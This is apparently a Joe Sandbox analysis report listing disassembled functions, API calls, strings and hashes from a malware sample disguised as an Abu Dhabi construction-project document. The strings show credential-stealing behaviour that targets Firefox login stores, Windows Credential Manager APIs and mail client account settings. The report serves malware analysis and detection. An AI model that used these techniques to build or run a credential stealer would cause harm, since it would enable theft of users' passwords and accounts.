                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                          • API String ID: 2003275452-3138536805
                                                                                                                          • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                          • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                          Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C3F7
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                          • strrchr.MSVCRT ref: 0040C417
                                                                                                                          • _mbscat.MSVCRT ref: 0040C431
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                          • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                          • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                          • API String ID: 1012775001-1343505058
                                                                                                                          • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                          • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                          Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00444612
                                                                                                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                          • strlen.MSVCRT ref: 0044462E
                                                                                                                          • memset.MSVCRT ref: 00444668
                                                                                                                          • memset.MSVCRT ref: 0044467C
                                                                                                                          • memset.MSVCRT ref: 00444690
                                                                                                                          • memset.MSVCRT ref: 004446B6
                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                          • String ID: salu
                                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                                          • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                          • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                          Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                          Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • sprintf.MSVCRT ref: 0040957B
                                                                                                                          • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                          • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                          • sprintf.MSVCRT ref: 004095EB
                                                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                          • memset.MSVCRT ref: 0040961C
                                                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                          • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                                                          • API String ID: 3259144588-3822380221
                                                                                                                          • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                          • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                          Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                          Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcsstr.MSVCRT ref: 0040426A
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                          • strchr.MSVCRT ref: 004042F6
                                                                                                                          • strlen.MSVCRT ref: 0040430A
                                                                                                                          • sprintf.MSVCRT ref: 0040432B
                                                                                                                          • strchr.MSVCRT ref: 0040433C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                                                          • API String ID: 3866421160-4070641962
                                                                                                                          • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                          • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                          Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                                          • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                          • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                          Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • strchr.MSVCRT ref: 004100E4
                                                                                                                          • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                          • _mbscat.MSVCRT ref: 0041014D
                                                                                                                          • memset.MSVCRT ref: 00410129
                                                                                                                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                            • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                          • memset.MSVCRT ref: 00410171
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                          • _mbscat.MSVCRT ref: 00410197
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                          • String ID: \systemroot
                                                                                                                          • API String ID: 912701516-1821301763
                                                                                                                          • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                          • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                          Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                          • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                          • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                          • API String ID: 888011440-2039793938
                                                                                                                          • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                          • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                          • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                          • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                          Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                          • strchr.MSVCRT ref: 0040327B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                          • API String ID: 1348940319-1729847305
                                                                                                                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                          Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                          • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                          • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                          Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004094C8
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                          • memset.MSVCRT ref: 0040950C
                                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                          • _strcmpi.MSVCRT ref: 00409531
                                                                                                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                                          • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                          • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                          Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3642520215-0
